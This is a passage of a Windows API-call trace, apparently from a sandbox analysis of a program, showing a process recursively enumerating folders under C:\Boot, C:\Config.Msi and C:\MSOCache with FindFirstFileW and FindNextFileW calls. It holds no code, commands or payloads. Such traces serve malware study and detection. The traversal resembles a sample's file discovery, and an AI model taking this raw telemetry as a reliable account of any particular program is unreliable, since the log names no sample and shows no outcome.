[0132.661] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.661] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.661] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.661] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.661] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.661] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.662] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.662] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.662] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.662] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.662] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.662] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.662] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.662] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.662] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.662] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.662] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.662] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.662] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.662] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.662] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.663] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.663] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.663] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.663] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.663] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.663] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.663] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.663] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.663] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.663] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.663] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.663] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.663] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.663] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.664] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.664] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.664] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.664] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.664] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.664] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.664] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.664] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.664] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.664] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.664] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.664] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.664] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.665] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.665] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.665] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.665] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.665] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.665] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.665] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.665] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.665] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.665] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.665] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.665] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.665] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.665] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.665] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.666] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.666] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.666] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.666] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.666] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.666] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.666] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.666] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.666] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.666] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.666] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.666] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.666] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.666] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.666] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.666] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.667] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.667] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.667] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.667] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.667] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.667] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.667] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.667] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.667] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.667] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.667] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.667] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.667] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.667] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.668] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.668] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.668] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.668] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.668] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.668] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.668] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.668] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.668] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0 [0132.668] FindClose (in: hFindFile=0xa28208 | out: hFindFile=0xa28208) returned 1 [0132.669] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0132.669] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0 [0132.669] FindClose (in: hFindFile=0xa281c8 | out: hFindFile=0xa281c8) returned 1 [0132.669] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0132.669] FindNextFileW (in: hFindFile=0xa279c8, lpFindFileData=0x253fc28 | out: lpFindFileData=0x253fc28) returned 1 [0132.669] FindNextFileW (in: hFindFile=0xa279c8, lpFindFileData=0x253fc28 | out: lpFindFileData=0x253fc28) returned 1 [0132.669] FindNextFileW (in: hFindFile=0xa279c8, lpFindFileData=0x253fc28 | out: lpFindFileData=0x253fc28) returned 1 [0132.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0xa281c8 [0132.669] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.669] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0 [0132.669] FindClose (in: hFindFile=0xa281c8 | out: hFindFile=0xa281c8) returned 1 [0132.669] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0132.669] FindNextFileW (in: hFindFile=0xa279c8, lpFindFileData=0x253fc28 | out: lpFindFileData=0x253fc28) returned 1 [0132.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0xffffffff [0132.669] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0132.669] FindNextFileW (in: hFindFile=0xa279c8, lpFindFileData=0x253fc28 | out: lpFindFileData=0x253fc28) returned 1 [0132.670] FindNextFileW (in: hFindFile=0xa279c8, lpFindFileData=0x253fc28 | out: lpFindFileData=0x253fc28) returned 1 [0132.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 0xa281c8 [0132.670] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.670] FindNextFileW (in: hFindFile=0xa281c8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0132.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa28208 [0132.772] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.773] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa2e408 [0132.773] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.773] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.777] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.787] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.787] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.787] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.787] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.787] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0132.787] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0132.787] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0132.787] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.787] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa2e408 [0132.787] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.787] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.788] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.788] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.788] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.788] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.788] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0132.788] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0132.788] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0132.788] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0132.788] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0132.788] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa2e408 [0133.269] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.269] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.269] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.269] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.269] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.270] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0133.270] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0133.270] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0133.270] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0133.270] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa28ec8 [0133.532] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.532] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.532] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.533] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.533] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.533] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.533] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0133.533] FindClose (in: hFindFile=0xa28ec8 | out: hFindFile=0xa28ec8) returned 1 [0133.533] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0133.533] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0133.533] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa28ec8 [0133.533] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.533] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.533] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.533] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.534] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.534] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.534] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0133.534] FindClose (in: hFindFile=0xa28ec8 | out: hFindFile=0xa28ec8) returned 1 [0133.534] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32e0060 | out: hHeap=0x20f0000) returned 1 [0133.534] FindNextFileW (in: hFindFile=0xa28208, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0133.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa28ec8 [0133.679] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.679] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.679] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa2eab0 [0133.680] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0133.680] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0133.680] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0133.680] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0133.680] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0133.680] FindClose (in: hFindFile=0xa2eab0 | out: hFindFile=0xa2eab0) returned 1 [0133.680] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0133.680] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.680] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa2eab0 [0133.681] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0133.681] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0133.681] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0133.681] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0133.681] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0133.681] FindClose (in: hFindFile=0xa2eab0 | out: hFindFile=0xa2eab0) returned 1 [0133.681] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0133.681] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa2eab0 [0133.682] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0133.682] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0133.682] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0133.682] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0133.682] FindNextFileW (in: hFindFile=0xa2eab0, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0133.682] FindClose (in: hFindFile=0xa2eab0 | out: hFindFile=0xa2eab0) returned 1 [0133.683] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0133.683] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.683] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.683] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0133.683] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0133.683] FindClose (in: hFindFile=0xa28ec8 | out: hFindFile=0xa28ec8) returned 1 